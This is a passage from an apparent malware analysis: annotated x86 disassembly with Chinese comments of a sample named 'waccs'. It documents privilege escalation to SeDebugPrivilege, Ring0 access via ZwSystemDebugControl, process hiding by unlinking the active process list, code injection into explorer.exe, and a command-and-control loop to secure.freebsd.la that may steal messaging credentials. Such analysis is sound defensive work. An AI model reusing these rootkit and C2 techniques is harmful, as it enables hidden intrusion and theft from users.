DWORD PTR DS:[408084] ; kernel32.ExitProcess(关闭退出). 00402D5D 8D85 4CFCFFFF LEA EAX,DWORD PTR SS:[EBP-3B4] 00402D63 50 PUSH EAX 00402D64 8D85 B0F9FFFF LEA EAX,DWORD PTR SS:[EBP-650] 00402D6A 50 PUSH EAX 00402D6B 8D85 48FCFFFF LEA EAX,DWORD PTR SS:[EBP-3B8] 00402D71 50 PUSH EAX 00402D72 E8 2D120000 CALL waccs.00403FA4 ; 获得操作系统版本号. 00402D77 83C4 0C ADD ESP,0C 00402D7A 83BD 48FCFFFF 0>CMP DWORD PTR SS:[EBP-3B8],5 ; 规范范围 00402D81 75 31 JNZ SHORT waccs.00402DB4 ; 如果系统版本不符合,则不执行"进程隐藏"操作. 00402D83 83BD B0F9FFFF 0>CMP DWORD PTR SS:[EBP-650],1 ; 规范范围 00402D8A 75 28 JNZ SHORT waccs.00402DB4 ; 如果系统版本不符合,则不执行"进程隐藏"操作. 00402D8C 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402D92 E8 15380000 CALL waccs.004065AC ; 提升自身进程权限为"SeDebugPrivilege"权限，列举进程的内核模块，得到"ntkrnlpa.exe"模块，导出"PsInitialSystemProcess"函数，调用ZwSystemDebugControl进入Ring0. 00402D97 FF15 80804000 CALL DWORD PTR DS:[408080] ; kernel32.GetCurrentProcessId(得到当前进程的ID). 00402D9D 50 PUSH EAX 00402D9E 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402DA4 E8 AC360000 CALL waccs.00406455 ; RRING3下实现进程隐藏(删除活动进程链表实现进程隐藏). 00402DA9 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402DAF E8 E6380000 CALL waccs.0040669A ; 释放内存资源. 00402DB4 68 B581D32E PUSH 2ED381B5 00402DB9 8D8D 70F8FFFF LEA ECX,DWORD PTR SS:[EBP-790] 00402DBF E8 0C030000 CALL waccs.004030D0 ; ASCII "t3x0" 00402DC4 50 PUSH EAX ; ASCII "t3x0" 00402DC5 6A 00 PUSH 0 00402DC7 6A 00 PUSH 0 00402DC9 FF15 7C804000 CALL DWORD PTR DS:[40807C] ; kernel32.CreateMutexA(创建一个互斥体"t3x0"). 00402DCF A3 D4A04000 MOV DWORD PTR DS:[40A0D4],EAX 00402DD4 8D8D 70F8FFFF LEA ECX,DWORD PTR SS:[EBP-790] 00402DDA E8 47F2FFFF CALL waccs.00402026 ; 清除内存数据. 00402DDF 68 BD81D32E PUSH 2ED381BD 00402DE4 8D8D 68F8FFFF LEA ECX,DWORD PTR SS:[EBP-798] 00402DEA E8 E1020000 CALL waccs.004030D0 ; ASCII "t3x0" 00402DEF 50 PUSH EAX 00402DF0 E8 1B270000 CALL waccs.00405510 ;向系统桌面程序“explorer.exe”进程内存空间中注入恶意代码，执行进程守护功能. 00402DF5 59 POP ECX 00402DF6 A3 D8A04000 MOV DWORD PTR DS:[40A0D8],EAX 00402DFB 8D8D 68F8FFFF LEA ECX,DWORD PTR SS:[EBP-798] 00402E01 E8 20F2FFFF CALL waccs.00402026 ; 清除内存数据. 00402E06 68 18010000 PUSH 118 00402E0B 6A 00 PUSH 0 00402E0D 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402E13 50 PUSH EAX 00402E14 E8 21420000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00402E19 83C4 0C ADD ESP,0C 00402E1C 68 10270000 PUSH 2710 00402E21 68 9B15572C PUSH 2C57159B 00402E26 8D8D 5CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7A4] 00402E2C E8 FF020000 CALL waccs.00403130 ; ASCII "$msr" 00402E31 50 PUSH EAX ; /MutexName = "$msr" 00402E32 6A 00 PUSH 0 ; \|InitialOwner = FALSE 00402E34 6A 00 PUSH 0 ; \|pSecurity = NULL 00402E36 FF15 7C804000 CALL DWORD PTR DS:[40807C] ; kernel32.CreateMutexA 00402E3C 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX 00402E42 FFB5 F0FEFFFF PUSH DWORD PTR SS:[EBP-110] 00402E48 FF15 78804000 CALL DWORD PTR DS:[408078] ; kernel32.WaitForSingleObject 00402E4E 2D 02010000 SUB EAX,102 00402E53 F7D8 NEG EAX 00402E55 1BC0 SBB EAX,EAX 00402E57 40 INC EAX 00402E58 8885 64F8FFFF MOV BYTE PTR SS:[EBP-79C],AL 00402E5E 8D8D 5CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7A4] 00402E64 E8 BDF1FFFF CALL waccs.00402026 ; 清除内存数据. 00402E69 0FB685 64F8FFFF MOVZX EAX,BYTE PTR SS:[EBP-79C] 00402E70 85C0 TEST EAX,EAX 00402E72 74 05 JE SHORT waccs.00402E79 00402E74 E8 2F420000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00402E79 8D85 B8FAFFFF LEA EAX,DWORD PTR SS:[EBP-548] 00402E7F 50 PUSH EAX ; /pWSAData = 0012FA78 00402E80 68 02020000 PUSH 202 ; \|RequestedVersion = 202 (2.2.) 00402E85 FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 2.0). 00402E8B 83A5 50FCFFFF 0>AND DWORD PTR SS:[EBP-3B0],0 00402E92 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402E94 68 6A2A944C PUSH 4C942A6A 00402E99 8D8D 50F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B0] 00402E9F E8 EC020000 CALL waccs.00403190 ; ASCII "##ghetto##" 00402EA4 50 PUSH EAX ; \|src = "##ghetto##" 00402EA5 8D85 85FEFFFF LEA EAX,DWORD PTR SS:[EBP-17B] 00402EAB 50 PUSH EAX ; \|dest = 0012FE45 00402EAC E8 EB410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402EB1 83C4 0C ADD ESP,0C 00402EB4 8D8D 50F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B0] 00402EBA E8 B7F1FFFF CALL waccs.00402076 ; 清除内存数据. 00402EBF 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402EC1 68 75F453B3 PUSH B353F475 00402EC6 8D8D 48F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B8] 00402ECC E8 1F030000 CALL waccs.004031F0 ; ASCII "3atsh1t" 00402ED1 50 PUSH EAX ; \|src = "3atsh1t" 00402ED2 8D85 9EFEFFFF LEA EAX,DWORD PTR SS:[EBP-162] 00402ED8 50 PUSH EAX ; \|dest = 0012FE5E 00402ED9 E8 BE410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402EDE 83C4 0C ADD ESP,0C 00402EE1 8D8D 48F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B8] 00402EE7 E8 EAF0FFFF CALL waccs.00401FD6 ; 清除内存数据. 00402EEC 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402EEE 68 36A1576B PUSH 6B57A136 00402EF3 8D8D 38F8FFFF LEA ECX,DWORD PTR SS:[EBP-7C8] 00402EF9 E8 52030000 CALL waccs.00403250 ; ASCII "##ghetto-s##" 00402EFE 50 PUSH EAX ; \|src = "##ghetto-s##" 00402EFF 8D85 B7FEFFFF LEA EAX,DWORD PTR SS:[EBP-149] 00402F05 50 PUSH EAX ; \|dest = 0012FE77 00402F06 E8 91410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F0B 83C4 0C ADD ESP,0C 00402F0E 8D8D 38F8FFFF LEA ECX,DWORD PTR SS:[EBP-7C8] 00402F14 E8 CF000000 CALL waccs.00402FE8 ; 清除内存数据. 00402F19 6A 01 PUSH 1 00402F1B 58 POP EAX 00402F1C 85C0 TEST EAX,EAX 00402F1E 0F84 BD000000 JE waccs.00402FE1 00402F24 68 80000000 PUSH 80 ; /maxlen = 80 (128.) 00402F29 68 C8F8D8A9 PUSH A9D8F8C8 00402F2E 8D8D 24F8FFFF LEA ECX,DWORD PTR SS:[EBP-7DC] 00402F34 E8 77030000 CALL waccs.004032B0 ; ASCII "secure.freebsd.la"(骇客定义的远程服务器域名地址，加密存放). 00402F39 50 PUSH EAX ; \|src = "secure.freebsd.la" 00402F3A 8D85 E8FDFFFF LEA EAX,DWORD PTR SS:[EBP-218] 00402F40 50 PUSH EAX ; \|dest = 0012FDA8 00402F41 E8 56410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F46 83C4 0C ADD ESP,0C 00402F49 8D8D 24F8FFFF LEA ECX,DWORD PTR SS:[EBP-7DC] 00402F4F E8 92EFFFFF CALL waccs.00401EE6 ; 清除内存数据. 00402F54 6A 19 PUSH 19 ; maxlen = 19 (25.) 00402F56 68 24DC4A5C PUSH 5C4ADC24 00402F5B 8D8D 1CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7E4] 00402F61 E8 AA030000 CALL waccs.00403310 ; ASCII "su1c1d3" 00402F66 50 PUSH EAX ; \|src = "su1c1d3" 00402F67 8D85 6CFEFFFF LEA EAX,DWORD PTR SS:[EBP-194] 00402F6D 50 PUSH EAX ; \|dest = 0012FE2C 00402F6E E8 29410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F73 83C4 0C ADD ESP,0C 00402F76 8D8D 1CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7E4] 00402F7C E8 55F0FFFF CALL waccs.00401FD6 ; 清除内存数据. 00402F81 C785 68FEFFFF 4>MOV DWORD PTR SS:[EBP-198],2646 00402F8B 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402F91 50 PUSH EAX 00402F92 E8 13E1FFFF CALL waccs.004010AA ; 连接骇客远程服务器"http://www.secure.freebsd.la". 00402F97 59 POP ECX 00402F98 0FB6C0 MOVZX EAX,AL 00402F9B 85C0 TEST EAX,EAX 00402F9D 74 32 JE SHORT waccs.00402FD1 ; 判断是否连接成功， 00402F9F 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402FA5 50 PUSH EAX 00402FA6 E8 98E1FFFF CALL waccs.00401143 ; 查找系统中是否运行某些通讯工具(可能会利用这些通讯工具发布广告、进行自我传播以及窃取其帐号密码信息等操作)，并构造发送数据包(多种包格式/与骇客远程服务器进行秘密通信). 00402FAB 59 POP ECX 00402FAC 0FB6C0 MOVZX EAX,AL 00402FAF 85C0 TEST EAX,EAX 00402FB1 74 1E JE SHORT waccs.00402FD1 00402FB3 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402FB9 50 PUSH EAX 00402FBA E8 4AE5FFFF CALL waccs.00401509 ; 接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作. 00402FBF 59 POP ECX 00402FC0 0FB6C0 MOVZX EAX,AL 00402FC3 85C0 TEST EAX,EAX 00402FC5 74 0A JE SHORT waccs.00402FD1 00402FC7 6A 0A PUSH 0A ; /Timeout = 10. ms 00402FC9 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待10毫秒). 00402FCF ^ EB E2 JMP SHORT waccs.00402FB3 ; 循环执行上边的代码(00402FB3-00402FCF)，接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作. 00402FD1 68 30750000 PUSH 7530 ; /Timeout = 30000. ms 00402FD6 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待30000毫秒). 00402FDC ^ E9 38FFFFFF JMP waccs.00402F19 ; 循环执行上边的代码(00402F19-00402FDC)，进行与骇客指定的远程服务器进行秘密通信(向骇客服务器发送数据包). 00402FE1 E8 C2400000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00402FE6 C9 LEAVE 00402FE7 C3 RETN ; 返回. ---------------------------------------------------------- 获得操作系统版本号： 00403FA4 55 PUSH EBP 00403FA5 8BEC MOV EBP,ESP 00403FA7 81EC 9C000000 SUB ESP,9C 00403FAD C785 64FFFFFF 9>MOV DWORD PTR SS:[EBP-9C],9C 00403FB7 8D85 64FFFFFF LEA EAX,DWORD PTR SS:[EBP-9C] 00403FBD 50 PUSH EAX 00403FBE FF15 B0804000 CALL DWORD PTR DS:[4080B0] ; kernel32.GetVersionExA(获取当前操作系统版本号信息). 00403FC4 85C0 TEST EAX,EAX 00403FC6 75 04 JNZ SHORT waccs.00403FCC ; 判断是否成功. 00403FC8 32C0 XOR AL,AL 00403FCA EB 21 JMP SHORT waccs.00403FED 00403FCC 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00403FCF 8B8D 68FFFFFF MOV ECX,DWORD PTR SS:[EBP-98] 00403FD5 8908 MOV DWORD PTR DS:[EAX],ECX 00403FD7 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] 00403FDA 8B8D 6CFFFFFF MOV ECX,DWORD PTR SS:[EBP-94] 00403FE0 8908 MOV DWORD PTR DS:[EAX],ECX 00403FE2 0FB745 F8 MOVZX EAX,WORD PTR SS:[EBP-8] 00403FE6 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 00403FE9 8901 MOV DWORD PTR DS:[ECX],EAX 00403FEB B0 01 MOV AL,1 00403FED C9 LEAVE 00403FEE C3 RETN ; 返回. 提升自身进程权限为"SeDebugPrivilege"权限，列举进程的内核模块，得到"ntkrnlpa.exe"模块，导出"PsInitialSystemProcess"函数，调用ZwSystemDebugControl进入Ring0： 004065AC 55 PUSH EBP 004065AD 8BEC MOV EBP,ESP 004065AF 81EC 30010000 SUB ESP,130 004065B5 898D D4FEFFFF MOV DWORD PTR SS:[EBP-12C],ECX 004065BB 6A 01 PUSH 1 004065BD E8 E00B0000 CALL waccs.004071A2 ; JMP 到 msvcrt.??2@YAPAXI@Z 004065C2 83C4 04 ADD ESP,4 004065C5 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX 004065CB 83BD F0FEFFFF 0>CMP DWORD PTR SS:[EBP-110],0 004065D2 74 13 JE SHORT waccs.004065E7 004065D4 8B8D F0FEFFFF MOV ECX,DWORD PTR SS:[EBP-110] 004065DA E8 A1F7FFFF CALL waccs.00405D80 ; 提升自身进程权限为"SeDebugPrivilege"权限. 004065DF 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX 004065E5 EB 0A JMP SHORT waccs.004065F1 004065E7 C785 D0FEFFFF 0>MOV DWORD PTR SS:[EBP-130],0 004065F1 8B85 D4FEFFFF MOV EAX,DWORD PTR SS:[EBP-12C] 004065F7 8B8D D0FEFFFF MOV ECX,DWORD PTR SS:[EBP-130] 004065FD 8908 MOV DWORD PTR DS:[EAX],ECX 004065FF 8D95 00FFFFFF LEA EDX,DWORD PTR SS:[EBP-100] 00406605 52 PUSH EDX 00406606 8D85 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP-10C] 0040660C 50 PUSH EAX 0040660D 8B8D D4FEFFFF MOV ECX,DWORD PTR SS:[EBP-12C] 00406613 E8 77FDFFFF CALL waccs.0040638F ; 列举进程的内核模块，得到"ntkrnlpa.exe"模块. 00406618 8D8D 00FFFFFF LEA ECX,DWORD PTR SS:[EBP-100] 0040661E 51 PUSH ECX ; /FileName = "ntkrnlpa.exe" 0040661F FF15 40804000 CALL DWORD PTR DS:[408040] ; kernel32.LoadLibraryA(加载"ntkrnlpa.exe"). 00406625 8985 F8FEFFFF MOV DWORD PTR SS:[EBP-108],EAX 0040662B 68 99C8E33A PUSH 3AE3C899 00406630 8D8D D8FEFFFF LEA ECX,DWORD PTR SS:[EBP-128] 00406636 E8 15020000 CALL waccs.00406850 ; ASCII "PsInitialSystemProcess" 0040663B 50 PUSH EAX ; /ProcNameOrOrdinal = "PsInitialSystemProcess" 0040663C 8B95 F8FEFFFF MOV EDX,DWORD PTR SS:[EBP-108] 00406642 52 PUSH EDX ; \|hModule = 009B0000 (ntkrnlpa) 00406643 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress(导出"PsInitialSystemProcess"函数). 00406649 8985 FCFEFFFF MOV DWORD PTR SS:[EBP-104],EAX 0040664F 8D8D D8FEFFFF LEA ECX,DWORD PTR SS:[EBP-128] 00406655 E8 C6000000 CALL waccs.00406720 ; 清除内存数据. 0040665A 8B85 FCFEFFFF MOV EAX,DWORD PTR SS:[EBP-104] 00406660 2B85 F8FEFFFF SUB EAX,DWORD PTR SS:[EBP-108] 00406666 0385 F4FEFFFF ADD EAX,DWORD PTR SS:[EBP-10C] 0040666C 50 PUSH EAX 0040666D 8B8D D4FEFFFF MOV ECX,DWORD PTR SS:[EBP-12C] 00406673 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406675 E8 5EF7FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040667A 8B95 D4FEFFFF MOV EDX,DWORD PTR SS:[EBP-12C] 00406680 8942 04 MOV DWORD PTR DS:[EDX+4],EAX 00406683 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00406689 50 PUSH EAX 0040668A FF15 3C804000 CALL DWORD PTR DS:[40803C] ; kernel32.FreeLibrary(卸载对"ntkrnlpa.exe"的调用). 00406690 8B85 D4FEFFFF MOV EAX,DWORD PTR SS:[EBP-12C] 00406696 8BE5 MOV ESP,EBP 00406698 5D POP EBP 00406699 C3 RETN ; 返回. 提升自身进程权限为"SeDebugPrivilege"权限： 00405D80 55 PUSH EBP 00405D81 8BEC MOV EBP,ESP 00405D83 83EC 18 SUB ESP,18 00405D86 894D E8 MOV DWORD PTR SS:[EBP-18],ECX 00405D89 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14] 00405D8C 50 PUSH EAX 00405D8D 6A 28 PUSH 28 00405D8F FF15 C8804000 CALL DWORD PTR DS:[4080C8] ; kernel32.GetCurrentProcess 00405D95 50 PUSH EAX 00405D96 FF15 14804000 CALL DWORD PTR DS:[408014] ; ADVAPI32.OpenProcessToken 00405D9C C745 F0 0100000>MOV DWORD PTR SS:[EBP-10],1 00405DA3 C745 FC 0200000>MOV DWORD PTR SS:[EBP-4],2 00405DAA 8D4D F4 LEA ECX,DWORD PTR SS:[EBP-C] 00405DAD 51 PUSH ECX 00405DAE 68 20A04000 PUSH waccs.0040A020 ; ASCII "SeDebugPrivilege" 00405DB3 6A 00 PUSH 0 00405DB5 FF15 10804000 CALL DWORD PTR DS:[408010] ; ADVAPI32.LookupPrivilegeValueA 00405DBB 6A 00 PUSH 0 00405DBD 6A 00 PUSH 0 00405DBF 6A 10 PUSH 10 00405DC1 8D55 F0 LEA EDX,DWORD PTR SS:[EBP-10] 00405DC4 52 PUSH EDX 00405DC5 6A 00 PUSH 0 00405DC7 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 00405DCA 50 PUSH EAX 00405DCB FF15 0C804000 CALL DWORD PTR DS:[40800C] ; ADVAPI32.AdjustTokenPrivileges 00405DD1 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] 00405DD4 8BE5 MOV ESP,EBP 00405DD6 5D POP EBP 00405DD7 C3 RETN ; 返回. 列举进程的内核模块，得到"ntkrnlpa.exe"模块： 0040638F 55 PUSH EBP 00406390 8BEC MOV EBP,ESP 00406392 81EC 38010000 SUB ESP,138 00406398 56 PUSH ESI 00406399 57 PUSH EDI 0040639A 898D C8FEFFFF MOV DWORD PTR SS:[EBP-138],ECX 004063A0 C745 FC 2001000>MOV DWORD PTR SS:[EBP-4],120 004063A7 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004063AA 50 PUSH EAX 004063AB 6A 00 PUSH 0 004063AD 6A 00 PUSH 0 004063AF 6A 0B PUSH 0B 004063B1 FF15 F4814000 CALL DWORD PTR DS:[4081F4] ; ntdll.ZwQuerySystemInformation 004063B7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 004063BA 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004063BD 51 PUSH ECX 004063BE E8 DF0D0000 CALL waccs.004071A2 ; JMP 到 msvcrt.??2@YAPAXI@Z 004063C3 83C4 04 ADD ESP,4 004063C6 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX 004063CC 8B95 D0FEFFFF MOV EDX,DWORD PTR SS:[EBP-130] 004063D2 8955 F4 MOV DWORD PTR SS:[EBP-C],EDX 004063D5 6A 00 PUSH 0 004063D7 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004063DA 50 PUSH EAX 004063DB 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004063DE 51 PUSH ECX 004063DF 6A 0B PUSH 0B 004063E1 FF15 F4814000 CALL DWORD PTR DS:[4081F4] ; ntdll.ZwQuerySystemInformation 004063E7 8B75 F4 MOV ESI,DWORD PTR SS:[EBP-C] 004063EA B9 48000000 MOV ECX,48 004063EF 8DBD D4FEFFFF LEA EDI,DWORD PTR SS:[EBP-12C] 004063F5 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 004063F7 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 004063FA 8995 CCFEFFFF MOV DWORD PTR SS:[EBP-134],EDX 00406400 8B85 CCFEFFFF MOV EAX,DWORD PTR SS:[EBP-134] 00406406 50 PUSH EAX 00406407 E8 9C0D0000 CALL waccs.004071A8 ; JMP 到 msvcrt.??3@YAXPAX@Z 0040640C 83C4 04 ADD ESP,4 0040640F 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00406412 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 00406418 8911 MOV DWORD PTR DS:[ECX],EDX 0040641A 8B85 F2FEFFFF MOV EAX,DWORD PTR SS:[EBP-10E] 00406420 25 FFFF0000 AND EAX,0FFFF 00406425 B9 00010000 MOV ECX,100 0040642A 2BC8 SUB ECX,EAX 0040642C 51 PUSH ECX 0040642D 8B95 F2FEFFFF MOV EDX,DWORD PTR SS:[EBP-10E] 00406433 81E2 FFFF0000 AND EDX,0FFFF 00406439 8D8415 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP+EDX-10C] 00406440 50 PUSH EAX 00406441 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 00406444 51 PUSH ECX 00406445 E8 520D0000 CALL waccs.0040719C ; JMP 到 msvcrt.memcpy 0040644A 83C4 0C ADD ESP,0C 0040644D 5F POP EDI 0040644E 5E POP ESI 0040644F 8BE5 MOV ESP,EBP 00406451 5D POP EBP 00406452 C2 0800 RETN 8 ; 返回. RING3下实现进程隐藏(删除活动进程链表实现进程隐藏)： 00406455 55 PUSH EBP 00406456 8BEC MOV EBP,ESP 00406458 83EC 1C SUB ESP,1C 0040645B 894D E4 MOV DWORD PTR SS:[EBP-1C],ECX 0040645E 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406461 8B48 04 MOV ECX,DWORD PTR DS:[EAX+4] 00406464 894D F4 MOV DWORD PTR SS:[EBP-C],ECX 00406467 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040646A C742 08 8800000>MOV DWORD PTR DS:[EDX+8],88 00406471 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406474 C740 0C 8400000>MOV DWORD PTR DS:[EAX+C],84 0040647B 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 0040647E 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406481 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 00406484 52 PUSH EDX 00406485 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406488 8B08 MOV ECX,DWORD PTR DS:[EAX] 0040648A E8 49F9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040648F 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406492 2B41 08 SUB EAX,DWORD PTR DS:[ECX+8] 00406495 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 00406498 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040649B 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 0040649E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 004064A1 50 PUSH EAX 004064A2 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064A5 8B09 MOV ECX,DWORD PTR DS:[ECX] 004064A7 E8 2CF9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064AC 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064AF 2B42 08 SUB EAX,DWORD PTR DS:[EDX+8] 004064B2 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 004064B5 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004064B8 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX 004064BB 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004064BE 894D E8 MOV DWORD PTR SS:[EBP-18],ECX 004064C1 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064C4 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004064C7 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 004064CA 50 PUSH EAX 004064CB 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064CE 8B09 MOV ECX,DWORD PTR DS:[ECX] 004064D0 E8 03F9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064D5 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064D8 2B42 08 SUB EAX,DWORD PTR DS:[EDX+8] 004064DB 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004064DE 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 004064E1 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004064E4 0348 08 ADD ECX,DWORD PTR DS:[EAX+8] 004064E7 51 PUSH ECX 004064E8 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064EB 8B0A MOV ECX,DWORD PTR DS:[EDX] 004064ED E8 E6F8FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064F2 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064F5 2B41 08 SUB EAX,DWORD PTR DS:[ECX+8] 004064F8 8945 EC MOV DWORD PTR SS:[EBP-14],EAX 004064FB 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064FE 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00406501 0342 0C ADD EAX,DWORD PTR DS:[EDX+C] 00406504 50 PUSH EAX 00406505 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406508 8B09 MOV ECX,DWORD PTR DS:[ECX] 0040650A E8 C9F8FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040650F 3B45 08 CMP EAX,DWORD PTR SS:[EBP+8] 00406512 0F85 82000000 JNZ waccs.0040659A 00406518 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040651B 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 0040651E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 00406521 50 PUSH EAX 00406522 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406525 8B55 E8 MOV EDX,DWORD PTR SS:[EBP-18] 00406528 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040652B 52 PUSH EDX 0040652C 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 0040652F 8B08 MOV ECX,DWORD PTR DS:[EAX] 00406531 E8 C6F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406536 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406539 8B55 E8 MOV EDX,DWORD PTR SS:[EBP-18] 0040653C 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040653F 52 PUSH EDX 00406540 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406543 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 00406546 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14] 00406549 8D440A 04 LEA EAX,DWORD PTR DS:[EDX+ECX+4] 0040654D 50 PUSH EAX 0040654E 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406551 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406553 E8 A4F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406558 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040655B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 0040655E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 00406561 50 PUSH EAX 00406562 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406565 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406568 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040656B 52 PUSH EDX 0040656C 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 0040656F 8B08 MOV ECX,DWORD PTR DS:[EAX] 00406571 E8 86F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406576 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406579 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8] 0040657C 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040657F 52 PUSH EDX 00406580 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406583 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 00406586 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406589 8D440A 04 LEA EAX,DWORD PTR DS:[EDX+ECX+4] 0040658D 50 PUSH EAX 0040658E 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406591 